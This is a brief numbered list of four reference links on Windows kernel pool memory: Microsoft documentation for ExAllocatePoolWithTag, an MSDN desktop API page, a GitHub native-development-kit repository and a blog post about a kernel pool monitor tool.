  1. https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-exallocatepoolwithtag
  2. https://msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx
  3. https://github.com/arizvisa/ndk
  4. http://blogs.microsoft.co.il/pavely/2016/09/14/kernel-pool-monitor-the-gui-version/